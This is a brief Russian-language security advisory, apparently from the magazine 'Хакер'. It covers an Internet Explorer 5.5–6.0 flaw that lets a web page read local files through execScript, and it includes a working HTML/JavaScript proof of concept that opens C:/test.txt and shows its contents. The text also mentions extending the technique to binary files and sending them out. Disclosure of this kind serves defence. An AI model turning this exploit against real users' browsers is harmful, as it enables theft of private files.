Хакер #305. Многошаговые SQL-инъекции
Уязвимость в IE позволяет читать и посылать местные файлы.
Проблема связанна с возможностью обратится к DOM локального файла, вызывая функцию execScript в созданном новом окне. Эксплоит, приведенный ниже, позволяет читать файлы через броузер, но также возможно прочитать любые другие двоичные файлы (прикрепляя событие к DOM, затем вызывая httpxmlcomponent). Для успешной эксплуатации требуется знать имя файла.
Уязвимость найдена в IE 5.5-6.0.
Эксплоит
Для проверки уязвимости, создайте файл test.txt c любым текстом, а затем просмотрите следующую страницу:
<html>
<head>
<title>Example exploit</title>
<script language="javascript">
var extDoc
function doIt() {
extDoc = document.open('file:///C:/test.txt','jelmer','height=200,width=400,status=no, toolbar=no,menubar=no,location=no');
cmd = 'extDoc.execScript("alert(document.body.innerText)", "Jscript");';
setTimeout(cmd,2000);
}
</script>
</head>
<body onload="doIt()">
Wait to 2 seconds
</body>
</html>